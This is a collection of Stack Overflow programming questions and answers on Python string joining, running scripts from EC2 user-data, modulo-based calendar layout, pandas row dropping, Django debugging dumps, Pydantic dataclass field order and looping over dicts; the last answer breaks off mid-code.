[ "str.replace can be used to replace one or multiple characters of same ASCII value to another. In your case, it would be:\na=input(\"inter your sentence: \")\na=a.replace(' ', '...')\nprint(a)\n\n", "do this.\na=input(\"inter your sentence: \")\n#split in to n str\n#print every str with ... as whitespace\na=a.split()\nprint(*a, sep='...')\n\nOr do this.\na=input(\"inter your sentence: \")\n#split in to n str\n#print every str with ... as whitespace\na=a.split()\nfinal_a = '...'.join(a)\nprint(final_a)\n\nOUTPUT (for input this is a test)\nthis...is...a...test\n\n\nReplying OP's comment. \"so what you think about this one for x in range(0,10): print (x ,sep='...', end=\"\") it didn't work too\"\nfor x in range(0,10):\n print(x ,sep='...', end=\"\")\n\nNote: sep seprate args provide in print method, Default sep=\" \"\nExample:\nprint(\"one\",\"1\", sep=\"-->\")\n# Output: one-->1\n\nAnd end: When every args print in terminal then print see the end value and print it in terminal. Default end=\"\\n\" \\n → newline\nExample:\nfor a in range(0, 10):\n print(a, end=\".|.\")\n\n#Output= 0.|.1.|.2.|.3.|.4.|.5.|.6.|.7.|.8.|.9.|. \n\n# Here when 0 prints then print method also print `end`'s value after that, and 1 then `end`'s value and so on.\n\nAnswer for your comment's question can be this.\nfor x in range(0,10):\n print(x,end='...')\n\nOutput\nAs I say end's value print after every print method args print, so '...' also prints after x last value(9).\n0...1...2...3...4...5...6...7...8...9...\n\n", "You can make use of the Python join and split functions in this case:\nThe code snippet:\ninputSentence = input(\"Enter your sentence: \")\n\nprint(\"...\".join(inputSentence.split()))\n\n\nThe output:\nEnter your sentence: This is a test\n\nThis...is...a...test\n\n" ]
[ 0, 0, 0 ]
[]
[]
[ "printf", "python", "string" ]
stackoverflow_0074592503_printf_python_string.txt
Q: Execute python script at launch time on Amazon Linux 2
I am trying to execute a Python script on an Amazon Linux 2 instance. In my user-data section I have a script which copies the Python script from an S3 bucket to the instance and executes it, like so:

#!/bin/bash
# e - stops the script if there is an error
# x - output every command in /var/log/syslog
set -e -x

# set AWS region
echo "export AWS_DEFAULT_REGION=us-east-1" >> /etc/profile
source /etc/profile

# copy python script from the s3 bucket
aws s3 cp s3://${bucket_name}/ /home/ec2-user --recursive
sudo python3 my_python_script.py

The problem is that the Python script doesn't seem to be getting executed at all. Note: the Python script gets copied fine from the bucket. What am I missing here?

UPDATE: after checking /var/log/cloud-init-output.log it looks like the problem is in the Python script; it cannot find the boto3 module:

+ python3 /home/ec2-user/my_python_script.py
Traceback (most recent call last):
  File "/home/ec2-user/my_python_script.py", line 1, in <module>
    import boto3
ModuleNotFoundError: No module named 'boto3'
Dec 10 15:52:25 cloud-init[3697]: util.py[WARNING]: Failed running /var/lib/cloud/instance/scripts/part-001 [1]
Dec 10 15:52:25 cloud-init[3697]: cc_scripts_user.py[WARNING]: Failed to run module scripts-user (scripts in /var/lib/cloud/instance/scripts)
Dec 10 15:52:25 cloud-init[3697]: util.py[WARNING]: Running module scripts-user (<module 'cloudinit.config.cc_scripts_user' from '/usr/lib/python2.7/site-packages/cloudinit/config/cc_scripts_user.pyc'>) failed

The odd part is that I do have the boto3 module installed: I created a custom AMI image that has all of the modules installed (I used pip3 to install them) before creating the custom AMI image.

UPDATE 2: I verified that the image does have the boto3 package installed in the python3 library:

[ec2-user@ip-ip ~]$ python3
Python 3.7.9 (default, Aug 27 2020, 21:59:41)
[GCC 7.3.1 20180712 (Red Hat 7.3.1-9)] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import boto3
>>>

UPDATE 3: The cause of the problem was that I had installed the boto3 package for my user only (i.e. pip3 install boto3 --user) and then created the AMI image. So after adding the line below to my user-data script it worked fine:

#!/bin/bash
...
sudo pip3 install boto3
sudo python3 my_python_script.py

A: You can redirect output to a file and read it to see the error. Did you have python3? Did your instance have a credential/role to access this bucket? Does your script require any third-party packages? Can you try to run the script above as root locally first? Also, the run command should be python3 /home/ec2-user/my_python_script.py.

A: For anyone who is using cloud-init and Terraform, this is how I managed to make it work (one part of a multipart cloud-init user data):

part {
  content_type = "text/x-shellscript"
  filename     = "run_src.sh"
  content      = <<-EOF
    #!/bin/bash
    cd /root
    mkdir tmp
    mkdir tmp/origin
    mkdir tmp/converted
    mkdir tmp/packaged

    pip3 install boto3
    cd src

    python3 main.py
  EOF
}

And it works like a charm.
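A small defensive sketch in Python for the failure mode in UPDATE 3 — cloud-init runs user-data as root, so packages installed with pip3 install --user under ec2-user are invisible to it. A guard at the top of the script (the message text is just an illustration) makes that mismatch obvious in /var/log/cloud-init-output.log:

import sys

try:
    import boto3
except ModuleNotFoundError:
    # root's python3 won't see ec2-user's `pip3 install --user` packages
    sys.exit("boto3 not importable with %s; install it system-wide "
             "(sudo pip3 install boto3)" % sys.executable)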
Execute python script at launch time on Amazon Linux 2
I am trying to execute a python script on an Amazon Linux 2 instance. In my user-data section I have a script which copies the python script from an S3 bucket to the instance and executes it like so: #!/bin/bash # e - stops the script if there is an error # x - output every command in /var/log/syslog set -e -x # set AWS region echo "export AWS_DEFAULT_REGION=us-east-1" >> /etc/profile source /etc/profile # copy python script from the s3 bucket aws s3 cp s3://${bucket_name}/ /home/ec2-user --recursive sudo python3 my_python_script.py The problem is that the python script doesn't seem to be getting executed at all. Note: the python script gets copied fine from the bucket What I am missing here? UPDATE: after checking /var/log/cloud-init-output.log it looks like the problem is in the python script, it cannot find the boto3 module: + python3 /home/ec2-user/my_python_script.py Traceback (most recent call last): File "/home/ec2-user/my_python_script.py", line 1, in <module> import boto3 ModuleNotFoundError: No module named 'boto3' Dec 10 15:52:25 cloud-init[3697]: util.py[WARNING]: Failed running /var/lib/cloud/instance/scripts/part-001 [1] Dec 10 15:52:25 cloud-init[3697]: cc_scripts_user.py[WARNING]: Failed to run module scripts-user (scripts in /var/lib/cloud/instance/scripts) Dec 10 15:52:25 cloud-init[3697]: util.py[WARNING]: Running module scripts-user (<module 'cloudinit.config.cc_scripts_user' from '/usr/lib/python2.7/site-packages/cloudinit/config/cc_scripts_user.pyc'>) failed The problem is that I do have boto3 module installed. I created a custom AMI image that does have all of the modules installed (I used pip3 to install them) before creating the custom AMI image UPDATE2 I verified that the image does have boto3 package installed in the python3 library: [ec2-user@ip-ip ~]$ python3 Python 3.7.9 (default, Aug 27 2020, 21:59:41) [GCC 7.3.1 20180712 (Red Hat 7.3.1-9)] on linux Type "help", "copyright", "credits" or "license" for more information. >>> import boto3 >>> UPDATE3 The cause of the problem was that I installed the boto3 package for my user only (i.e. pip3 install boto3 --user) and then I created the AMI image. So after adding the bellow line to my user-data script it worked fine #!/bin/bash ... sudo pip3 install boto3 sudo python3 my_python_script.py
[ "You can redirect output to a file and read it to see the error: did you have python3, did your instance have credentianl/role to access this bucket, did you script requires any third party, can you try to run the script above as root in local first, the run command should be python3 /home/ec2-user/my_python_script.py?\n", "For anyone who is using cloudinit and terraform, this is how I managed it to work (one part of multipart cloudinit user data)-\npart {\n content_type = \"text/x-shellscript\"\n filename = \"run_src.sh\"\n content = <<-EOF\n #!/bin/bash\n cd /root\n mkdir tmp\n mkdir tmp/origin\n mkdir tmp/converted\n mkdir tmp/packaged\n \n pip3 install boto3\n cd src\n\n python3 main.py\n\n EOF\n }\n\nAnd it works like charm.\n" ]
[ 1, 0 ]
[]
[]
[ "amazon_web_services", "python" ]
stackoverflow_0065237455_amazon_web_services_python.txt
Q: Count issue due to variable not operating properly, subtracting or adding wrong
This is the setup for a calendar; is there a better way to create a count?

for k, v in months.items():
    print(k)  # print the month name
    print(month_header)
    while month_daycount > 7:
        month_daycount -= 7
        count = month_daycount

A: I'm not sure about your code specifically, but I feel that your code could be greatly simplified by using the datetime library of Python. You could then simply use the delta function to iterate over the days, and as you already have the formatting defined, your problem would be solved!

A: You are in desperate need of the modulo operator to get your columns lined up! If you are not familiar, do a little google searching, but the essence is that the modulo operator returns the remainder when doing division and is commonly used for things that roll over, like converting a large number of hours into the time of day using modulo to remove the number of days. In Python the modulo operator is %. For example, using a 24-hour clock and a starting time of 15, if I want to add 100 hours and know what time it is, I can:

(15 + 100) % 24
# 19

to see that the new time is 1900hrs (7pm), which is the remainder after dividing by 24. You can use this to keep track of which column you are in, as long as you keep a running total of the items printed. Here is a toy example you can incorporate into your code with some modification:

Code:

periods = [8,15,17,20]
row_length = 7

total_chars = 0
for period in periods:
    # find the current column using modulo to get the remainder
    current_column = total_chars % row_length
    # add n tabs to set first col
    print('\t' * current_column, end='')
    for day_count in range(1, period+1):
        print(day_count, end='\t')
        total_chars += 1
        if total_chars % row_length == 0:  # use modulo again to see if we are at end of row, 0 remainder...
            print()
    print('\na new period has started!')

Output:

1   2   3   4   5   6   7
8
a new period has started!
    1   2   3   4   5   6
7   8   9   10  11  12  13
14  15
a new period has started!
        1   2   3   4   5
6   7   8   9   10  11  12
13  14  15  16  17
a new period has started!
            1   2
3   4   5   6   7   8   9
10  11  12  13  14  15  16
17  18  19  20
a new period has started!
Count issue due to variable not operating properly, subtracting or adding wrong
This is the setup for a calendar, is there a better way to create a count? for k,v in months.items(): print(k) # print the month name print(month_header) while month_daycount > 7: month_daycount -= 7 count = month_daycount
[ "I'm not sure about your code specifically, but I feel that your code could be greatly simplified by using the datetime library of Python. You could then simply use the delta function to iterate over the days and as you already have the formatting defined, your problem would be solved!\n", "You are in desperate need of the modulo operator to get your columns lined up!\nIf you are not familiar, do a little google searching, but the essence is that the modulo operator returns the remainder when doing division and is commonly used for things that roll over, like converting a large number of hours into the time of day using modulo to remove the number of days. In python the modulo operator is %. For example, using a 24 hour clock, and a starting time of 15, if I want to add 100 hours and know what time it is I can:\n(15 + 100) % 24\n# 19\n\nto see that the new time is 1900hrs (7pm), which is the remainder after dividing by 24.\nYou can use this to keep track of what column you are in, as long as you keep a running total of the items printed. Here is a toy example you can incorporate in your code with some modification:\nCode:\nperiods = [8,15,17,20]\nrow_length = 7\n\ntotal_chars = 0\nfor period in periods:\n # find the current column using modulo to get the remainder\n current_column = total_chars % row_length\n # add n tabs to set first col\n print('\\t' * current_column, end='') \n for day_count in range(1, period+1):\n print(day_count, end='\\t')\n total_chars += 1\n if total_chars % row_length == 0: # use modulo again to see if we are at end of row, 0 remainder...\n print()\n print('\\na new period has started!')\n\nOutput:\n1 2 3 4 5 6 7 \n8 \na new period has started!\n 1 2 3 4 5 6 \n7 8 9 10 11 12 13 \n14 15 \na new period has started!\n 1 2 3 4 5 \n6 7 8 9 10 11 12 \n13 14 15 16 17 \na new period has started!\n 1 2 \n3 4 5 6 7 8 9 \n10 11 12 13 14 15 16 \n17 18 19 20 \na new period has started!\n\n" ]
[ 0, 0 ]
[]
[]
[ "count", "modulo", "python" ]
stackoverflow_0074592406_count_modulo_python.txt
Q: Why is df.drop dropping more rows than it should
I have a data frame (other_team_df) of Premier League teams, and I want to drop rows where the home team is one of: Arsenal, Chelsea, Liverpool, Tottenham, Man City or Man United. When I run the code below, del_row_index has length 1596 and other_team_df has 5321 rows, so I'm expecting 3725 rows to be left after the drop. However, I only get back 72 rows and I'm not sure why.

del_row_index = other_team_df[(other_team_df['HomeTeam']=='Arsenal')
    | (other_team_df['HomeTeam']=='Chelsea')
    | (other_team_df['HomeTeam']=='Liverpool')
    | (other_team_df['HomeTeam']=='Tottenham')
    | (other_team_df['HomeTeam']=='Man City')
    | (other_team_df['HomeTeam']=='Man United')].index
other_team_df.drop(del_row_index)

A: Use isin and boolean indexing:

to_drop = ['Arsenal', 'Chelsea', 'Liverpool', 'Tottenham', 'Man City', 'Man United']

out = other_team_df.loc[~other_team_df['HomeTeam'].isin(to_drop)]
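If the drop-based form is preferred, an equivalent hedged sketch on a toy stand-in frame — note that DataFrame.drop returns a new frame by default, so the result must be assigned (a common source of "nothing was dropped" confusion, though it would not by itself explain the 72-row result here):

import pandas as pd

# toy stand-in for other_team_df (the column name is taken from the question)
other_team_df = pd.DataFrame({'HomeTeam': ['Arsenal', 'Burnley', 'Chelsea', 'Fulham']})

to_drop = ['Arsenal', 'Chelsea', 'Liverpool', 'Tottenham', 'Man City', 'Man United']
mask = other_team_df['HomeTeam'].isin(to_drop)

# drop() returns a copy, so reassign (or pass inplace=True)
other_team_df = other_team_df.drop(other_team_df[mask].index)
print(other_team_df)  # Burnley and Fulham remain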
Why is df.drop dropping more rows than it should
I have a data frame (other_team_df) of premier league teams and I want to drop rows where the home team is either: Arsenal, Chelsea, Liverpool, Tottenham, Man City or Man United. When I run the code below, del_row_index has length=1596 and other_team_df has 5321 rows. So im expecting 3725 rows to be left after the drop. However, I only get back 72 rows and I'm not sure why del_row_index=other_team_df[(other_team_df['HomeTeam']=='Arsenal') |(other_team_df['HomeTeam']=='Chelsea')| (other_team_df['HomeTeam']=='Liverpool') |(other_team_df['HomeTeam']=='Tottenham')| (other_team_df['HomeTeam']=='Man City')| (other_team_df['HomeTeam']=='Man United')].index other_team_df.drop(del_row_index)
[ "Use isin and boolean indexing:\nto_drop = ['Arsenal', 'Chelsea', 'Liverpool', 'Tottenham', 'Man City', 'Man United']\n\nout = other_team_df.loc[~other_team_df['HomeTeam'].isin(to_drop)]\n\n" ]
[ 0 ]
[]
[]
[ "delete_row", "drop", "pandas", "python", "row" ]
stackoverflow_0074592646_delete_row_drop_pandas_python_row.txt
Q: Laravel's dd() equivalent in django
I am new to Django and having a hard time figuring out how to print what an object has inside — I mean the type and value of the variable along with its members, just like Laravel's dd(object) function. Laravel's dd() is a handy tool for debugging an application. I have searched for an equivalent but found nothing useful. I have tried pprint(), simplejson, print(type(object)) and {% debug %}, but none of them could provide the required information about an object. By contrast, Laravel's dd() — printing, say, Laravel's request object — shows complete information: the name of the class the object belongs to and its member variables, each with its own class name and value, and it keeps digging deep into nested objects and prints all of the information. I am not able to find a similar tool in Django, which is hard to believe given how useful it is, so I would like to know about any third-party package that can do the trick. I am using Django version 2.0.5 and trying to print django.contrib.messages. Also, I want the output displayed in the browser, not in the console, in a well-readable way — that's why I am asking for a Django package that can take in an object and render a well-formed presentation of its structure.

A: You are looking for the __dict__ property or dir():

print(object.__dict__)

Use pprint for beautified output:

from pprint import pprint
pprint(dir(object))

A: Raise an exception. Assuming you've got debug on, you'll see the exception message. It's crude, but it's helped me in the past. Just:

raise Exception("I want to know the value of this: " + myvariable_as_a_string)

Other answers and commenters ignored the crucial "and die" part of the dd() function, which prevents things like subsequent redirects.

A: Actually, Django does not provide this specialized function, so to get around the problem I made a custom dd()-style function and use it in all my Django projects. Perhaps it can help someone. Let's assume we have a library folder named app_libs and in that folder a library file named dump.py, i.e. app_libs > dump.py:

from django.core import serializers
from collections.abc import Iterable
from django.db.models.query import QuerySet
from django.core.exceptions import ObjectDoesNotExist


def dd(request, data=''):
    try:
        scheme = request.scheme
        server_name = request.META['SERVER_NAME']
        server_port = request.META['SERVER_PORT']
        remote_addr = request.META['REMOTE_ADDR']
        user_agent = request.META['HTTP_USER_AGENT']
        path = request.path
        method = request.method
        session = request.session
        cookies = request.COOKIES

        get_data = {}
        for key, value in request.GET.lists():
            get_data[key] = value

        post_data = {}
        for key, value in request.POST.lists():
            post_data[key] = value

        files = {}
        for key, value in request.FILES.lists():
            files['name'] = request.FILES[key].name
            files['content_type'] = request.FILES[key].content_type
            files['size'] = request.FILES[key].size

        dump_data = ''
        query_data = ''
        executed_query = ''
        if data:
            if isinstance(data, Iterable):
                if isinstance(data, QuerySet):
                    executed_query = data.query
                    query_data = serializers.serialize('json', data)
                else:
                    dump_data = dict(data)
            else:
                query_data = serializers.serialize('json', [data])

        msg = f'''
        <html>
        <span style="color: red;"><b>Scheme</b></span> : <span style="color: blue;">{scheme}</span><br>
        <span style="color: red;"><b>Server Name</b></span> : <span style="color: blue;">{server_name}</span><br>
        <span style="color: red;"><b>Server Port</b></span> : <span style="color: blue;">{server_port}</span><br>
        <span style="color: red;"><b>Remote Address</b></span>: <span style="color: blue;">{remote_addr}</span><br>
        <span style="color: red;"><b>User Agent</b></span> : <span style="color: blue;">{user_agent}</span><br>
        <span style="color: red;"><b>Path</b></span> : <span style="color: blue;">{path}</span><br>
        <span style="color: red;"><b>Method</b></span> : <span style="color: blue;">{method}</span><br>
        <span style="color: red;"><b>Session</b></span> : <span style="color: blue;">{session}</span><br>
        <span style="color: red;"><b>Cookies</b></span> : <span style="color: blue;">{cookies}</span><br>
        <span style="color: red;"><b>Get Data</b></span> : <span style="color: blue;">{get_data}</span><br>
        <span style="color: red;"><b>Post Data</b></span> : <span style="color: blue;">{post_data}</span><br>
        <span style="color: red;"><b>Files</b></span> : <span style="color: blue;">{files}</span><br>
        <span style="color: red;"><b>Executed Query</b></span>: <span style="color: blue;"><br>{executed_query}</span><br>
        <span style="color: red;"><b>Query Data</b></span> : <span style="color: blue;"><br>{query_data}</span><br>
        <span style="color: red;"><b>Dump Data</b></span> : <span style="color: blue;"><br>{dump_data}</span><br>
        </html>
        '''

        return msg
    except ObjectDoesNotExist:
        return False

When you need to use this function, just call it like this in any views.py:

from django.http import HttpResponse
from django.shortcuts import render
from django.views import View

from app_libs.dump import dd
from .models import Products

class ProductView(View):
    def get(self, request):
        data = {}
        data['page_title'] = 'products'
        data['products'] = Products.objects.get_all_product()

        template = 'products/collections.html'

        dump_data = dd(request, data['products'])
        return HttpResponse(dump_data)

        # return render(request, template, data)

That's it.

A: You can set a breakpoint just after the variable you need to inspect:

# for example, your code looks like
...other code
products = Product.objects.all()
# here you set a breakpoint
breakpoint()
...other code

Now you need to run your code up to this exact location, and due to the breakpoint it stops. Then look at the terminal: it has switched to a special mode where you enter code like this one:

products.__dict__  # and hit enter. Now you'll see all properties in your variable.

A: I was looking for something similar, and there is this Python package django-dump-die that provides exactly this; it was inspired by Laravel. https://pypi.org/project/django-dump-die/0.1.5/
Laravel's dd() equivalent in django
I am new in Django and having a hard time figuring out how to print what an object have inside. I mean type and value of the variable with its members inside. Just like Laravel's dd(object) function. Laravel's dd() is a handy tool for debugging the application. I have searched for it. But found nothing useful. I have tried pprint(), simplejson, print(type(object) and {% debug %}. But none of them could provide the required information about an object. Here is a sample output from Laravel's dd() function. In this Image, I am printing the request object of Laravel. as you can see its showing complete information about an object. I mean name of class it belongs to, its member variables. also with its class name and value. and it keeps digging deep inside the object and prints all the information. But I am not able to find a similar tool in Django. That's hard to believe that Django doesn't have such a useful tool. Therefore I would like to know about any third party package that can do the trick. I am using Django version 2.0.5. and trying to print django.contrib.messages Also, I want the output to be displayed in the browser, not in the console. In a well readable way that's why I am asking for a Django package that can take in the object and render a well-formed presentation of object architecture.
[ "You are looking for __dict__ property or dir()\nprint(object.__dict__)\n\nUse pprint for beautified output\nfrom pprint import pprint\npprint(dir(object))\n\n", "Raise an exception. Assuming you've got debug on you'll see the exception message. It's crude but it's helped me in the past. \nJust:\n raise Exception(\"I want to know the value of this: \" + myvariable_as_a_string)\n\nOther answers & commenters ignored the crucial \"and die\" part of the dd() function, which prevents things like subsequent redirects. \n", "Actually Django does not provide this specialized function. So in order to get rid of this problem, I made a custom dd() type function and use this in all Django projects. Perhaps it can help someone. \nLet's assume, we have a library folder named app_libs and in that folder we have a library file named dump.py. Like app_libs > dump.py:\nfrom django.core import serializers\nfrom collections.abc import Iterable\nfrom django.db.models.query import QuerySet\nfrom django.core.exceptions import ObjectDoesNotExist\n\n\ndef dd(request, data=''):\n try:\n scheme = request.scheme\n server_name = request.META['SERVER_NAME']\n server_port = request.META['SERVER_PORT']\n remote_addr = request.META['REMOTE_ADDR']\n user_agent = request.META['HTTP_USER_AGENT']\n path = request.path\n method = request.method\n session = request.session\n cookies = request.COOKIES\n\n get_data = {}\n for key, value in request.GET.lists():\n get_data[key] = value\n\n post_data = {}\n for key, value in request.POST.lists():\n post_data[key] = value\n\n files = {}\n for key, value in request.FILES.lists():\n files['name'] = request.FILES[key].name\n files['content_type'] = request.FILES[key].content_type\n files['size'] = request.FILES[key].size\n\n dump_data = ''\n query_data = ''\n executed_query = ''\n if data:\n if isinstance(data, Iterable):\n if isinstance(data, QuerySet):\n executed_query = data.query\n query_data = serializers.serialize('json', data)\n else:\n dump_data = dict(data)\n else:\n query_data = serializers.serialize('json', [data])\n\n\n msg = f'''\n <html>\n <span style=\"color: red;\"><b>Scheme</b></span> : <span style=\"color: blue;\">{scheme}</span><br>\n <span style=\"color: red;\"><b>Server Name</b></span> : <span style=\"color: blue;\">{server_name}</span><br>\n <span style=\"color: red;\"><b>Server Port</b></span> : <span style=\"color: blue;\">{server_port}</span><br>\n <span style=\"color: red;\"><b>Remote Address</b></span>: <span style=\"color: blue;\">{remote_addr}</span><br>\n <span style=\"color: red;\"><b>User Agent</b></span> : <span style=\"color: blue;\">{user_agent}</span><br>\n <span style=\"color: red;\"><b>Path</b></span> : <span style=\"color: blue;\">{path}</span><br>\n <span style=\"color: red;\"><b>Method</b></span> : <span style=\"color: blue;\">{method}</span><br>\n <span style=\"color: red;\"><b>Session</b></span> : <span style=\"color: blue;\">{session}</span><br>\n <span style=\"color: red;\"><b>Cookies</b></span> : <span style=\"color: blue;\">{cookies}</span><br>\n <span style=\"color: red;\"><b>Get Data</b></span> : <span style=\"color: blue;\">{get_data}</span><br>\n <span style=\"color: red;\"><b>Post Data</b></span> : <span style=\"color: blue;\">{post_data}</span><br>\n <span style=\"color: red;\"><b>Files</b></span> : <span style=\"color: blue;\">{files}</span><br>\n <span style=\"color: red;\"><b>Executed Query</b></span>: <span style=\"color: blue;\"><br>{executed_query}</span><br>\n <span style=\"color: red;\"><b>Query Data</b></span> : <span 
style=\"color: blue;\"><br>{query_data}</span><br>\n <span style=\"color: red;\"><b>Dump Data</b></span> : <span style=\"color: blue;\"><br>{dump_data}</span><br>\n </html>\n '''\n\n return msg\n except ObjectDoesNotExist:\n return False\n\nwhen you need to use this function, just call it like this in any views.py:\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.views import View\n\nfrom app_libs.dump import dd\nfrom .models import Products\n\nclass ProductView(View):\n def get(self, request):\n data = {}\n data['page_title'] = 'products'\n data['products'] = Products.objects.get_all_product()\n\n template = 'products/collections.html'\n\n dump_data = dd(request, data['products'])\n return HttpResponse(dump_data)\n\n # return render(request, template, data)\n\nthat's it.\n", "You can set breakpoint just after variable you need to inspect.\n\n# for example your code looks like\n...other code\nproducts = Product.objects.all()\n# here you set a breakpoint\nbreakpoint()\n...other code\nNow you need to call you code in this exact location and due to breakpoint it stops.\nThen you want to look up in terminal, it switched to special mode where you need to \nenter code like this one:\nproducts.__dict__ # and hit enter. Now you'll see all properties in your variable.\n\n", "I was looking for something similar and there is this python package django-dump-die that provides exactly this, it was inspired from laravel.\nhttps://pypi.org/project/django-dump-die/0.1.5/\n" ]
[ 6, 3, 3, 0, 0 ]
[]
[]
[ "debugging", "django", "flask", "laravel", "python" ]
stackoverflow_0050553820_debugging_django_flask_laravel_python.txt
Q: How to make only one expected value in Pydantic dataclass
I'm trying to make one or more expected values non-literal (a plain typed field with a default), but I get the error TypeError: non-default argument 'breakdownAccount' follows default argument. This example raises the error:

@dataclass
class DataInclude:
    currencyAccount: Literal["CNY счет", "AMD счет", "RUB счет", "USD счет", "EUR счет", "GBP счет", "CHF счет"]
    open: bool = True
    accountType: Literal["Текущий счет"]
    currencyCode: Literal[810, 826, 756, 978, 840, 51, 156]
    currency: Literal['CNY', 'AMD', 'RUB', 'USD', 'EUR', 'GBP', 'CHF']

This example works:

@dataclass
class DataInclude:
    currencyAccount: Literal["CNY счет", "AMD счет", "RUB счет", "USD счет", "EUR счет", "GBP счет", "CHF счет"]
    open: bool
    accountType: Literal["Текущий счет"]
    currencyCode: Literal[810, 826, 756, 978, 840, 51, 156]
    currency: Literal['CNY', 'AMD', 'RUB', 'USD', 'EUR', 'GBP', 'CHF']

How can I keep a default for a field when the other expected values are static? I use all this for API autotests. I have searched everywhere for this information.

A: Fields without default values cannot appear after fields with default values. Declare the open field as the last one.

from typing import Literal
from dataclasses import dataclass


@dataclass
class DataInclude:
    currencyAccount: Literal[
        "CNY счет",
        "AMD счет",
        "RUB счет",
        "USD счет",
        "EUR счет",
        "GBP счет",
        "CHF счет",
    ]
    accountType: Literal["Текущий счет"]
    currencyCode: Literal[810, 826, 756, 978, 840, 51, 156]
    currency: Literal["CNY", "AMD", "RUB", "USD", "EUR", "GBP", "CHF"]
    open: bool = True
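If the field order must stay as-is, another hedged option — assuming Python 3.10+, where stdlib dataclasses gained kw_only (recent pydantic versions pass this through as well) — is to make the fields keyword-only, which lifts the ordering restriction (the Literal lists are shortened here for brevity):

from dataclasses import dataclass  # or pydantic.dataclasses.dataclass
from typing import Literal

@dataclass(kw_only=True)  # Python 3.10+: a default may precede non-defaults
class DataInclude:
    currencyAccount: Literal["CNY счет", "EUR счет"]
    open: bool = True  # no longer forces reordering
    accountType: Literal["Текущий счет"]
    currencyCode: Literal[810, 978]
    currency: Literal["CNY", "EUR"]

obj = DataInclude(currencyAccount="CNY счет", accountType="Текущий счет",
                  currencyCode=810, currency="CNY")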
How to make only one expected value in Pydantic dataclass
I'm trying to make one or more expected values non-literal. But I get error TypeError: non-default argument 'breakdownAccount' follows default argument. This example raised error: @dataclass class DataInclude: currencyAccount: Literal["CNY счет", "AMD счет", "RUB счет", "USD счет", "EUR счет", "GBP счет", "CHF счет"] open: bool = True accountType: Literal["Текущий счет"] currencyCode: Literal[810, 826, 756, 978, 840, 51, 156] currency: Literal['CNY', 'AMD', 'RUB', 'USD', 'EUR', 'GBP', 'CHF'] This example working: @dataclass class DataInclude: currencyAccount: Literal["CNY счет", "AMD счет", "RUB счет", "USD счет", "EUR счет", "GBP счет", "CHF счет"] open: bool accountType: Literal["Текущий счет"] currencyCode: Literal[810, 826, 756, 978, 840, 51, 156] currency: Literal['CNY', 'AMD', 'RUB', 'USD', 'EUR', 'GBP', 'CHF'] How can I put in expected values if they are static? I use all this for API autotests I have searched everywhere for this information.
[ "Fields without default values cannot appear after fields with default values.\nDeclare the open field as the last one.\nfrom typing import Literal\nfrom dataclasses import dataclass\n\n\n@dataclass\nclass DataInclude:\n currencyAccount: Literal[\n \"CNY счет\",\n \"AMD счет\",\n \"RUB счет\",\n \"USD счет\",\n \"EUR счет\",\n \"GBP счет\",\n \"CHF счет\",\n ]\n accountType: Literal[\"Текущий счет\"]\n currencyCode: Literal[810, 826, 756, 978, 840, 51, 156]\n currency: Literal[\"CNY\", \"AMD\", \"RUB\", \"USD\", \"EUR\", \"GBP\", \"CHF\"]\n open: bool = True\n\n" ]
[ 1 ]
[]
[]
[ "automated_tests", "pydantic", "python" ]
stackoverflow_0074592440_automated_tests_pydantic_python.txt
Q: How to Construct Method and Attributes using Dictionaries in Python

class print_values:
    def __init__(self, username, user_email, displayname):
        self.name = username
        self.email = user_email
        self.DisplayName = displayname
    def printing_content(self):
        print(f"UserName: {self.name}\n"
              f"UserEmail: {self.email}\n"
              f"UserDisplayName:{self.DisplayName}\n")

user_one = {'username': 'userone', 'useremail': 'userone@gmail.com', 'displayname': 'User One'}
user_two = {'username': 'usertwo', 'useremail': 'usertwo@gmail.com', 'displayname': 'User Two'}
user_three = {'username': 'userthree', 'useremail': 'userthree@gmail.com', 'displayname': 'User Three'}

users_list = ['user_one', 'user_two', 'user_three']

obj_name = print_values(user_one['username'], user_one['useremail'], user_one['displayname'])
obj_name.printing_content()

It's working fine; I am getting the output below:

UserName: userone
UserEmail: userone@gmail.com
UserDisplayName:User One

Here I am only using the user_one dict; I want to do the same for multiple dicts. I have tried adding the dict names to a list and looping through them, like below:

for item in user_list:
    obj_name = print_values(item['username'], item['useremail'], item['displayname'])
    obj_name.printing_content()

But I am getting the error below:

obj_name=print_values(item['username'],item['useremail'],item['displayname'])
TypeError: string indices must be integers

Anyone, do let me know what I am missing, or any other idea to get this done. Thanks in advance!

A: This is because in users_list=['user_one', 'user_two', 'user_three'] you entered the variable names as strings.

class print_values:
    def __init__(self, username, user_email, displayname):
        self.name = username
        self.email = user_email
        self.DisplayName = displayname
    def printing_content(self):
        print(f"UserName: {self.name}\n"
              f"UserEmail: {self.email}\n"
              f"UserDisplayName:{self.DisplayName}\n")

user_one = {'username': 'userone', 'useremail': 'userone@gmail.com', 'displayname': 'User One'}
user_two = {'username': 'usertwo', 'useremail': 'usertwo@gmail.com', 'displayname': 'User Two'}
user_three = {'username': 'userthree', 'useremail': 'userthree@gmail.com', 'displayname': 'User Three'}

users_list = [user_one, user_two, user_three]  # edited

obj_name = print_values(user_one['username'], user_one['useremail'], user_one['displayname'])
obj_name.printing_content()

for item in users_list:
    obj_name = print_values(item['username'], item['useremail'], item['displayname'])
    obj_name.printing_content()

Explanation: Your users_list=['user_one', 'user_two', 'user_three'] is a list of strings containing the variable names. When you loop over it with for item in user_list:, item is not the variable user_one or user_two but the string 'user_one' or 'user_two'. So when you try to get values like item['username'], you get the error, because item is a string here — not a dictionary or JSON — and inside the brackets [] of a string you can only provide an integer index like 0, 1, 2, .... I hope you understand. Thanks.

Don't make a dictionary for every user. Use this code:

class Users:
    def __init__(self) -> None:
        self.userList = []
    def addUser(self, user):
        self.userList.append(user)


class User:
    def __init__(self, username, email, name) -> None:
        self.username = username
        self.email = email
        self.name = name
    def __str__(self) -> str:
        return f"Username = {self.username}\nEmail = {self.email}\nName = {self.name}\n"


users = Users()

users.addUser(User("username1", "email1", "name1"))
users.addUser(User("username2", "email2", "name2"))

# First way of printing
for user in users.userList:
    print(user)  # Printing the user directly prints the formatted output,
    # because the magic `__str__` method is overridden in the User class.
    # Whatever string __str__ returns is printed when you print the object.

# Second way of printing
for user in users.userList:
    print("Username = " + user.username)
    print("Email = " + user.email)
    print("Name = " + user.name)
    print()  # for adding one extra line
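One more hedged variant: if the dict keys are renamed to match print_values's __init__ parameter names exactly (note user_email below instead of the question's useremail — an assumed rename), each dict can be unpacked straight into the constructor with ** (this relies on the print_values class defined above):

users = [
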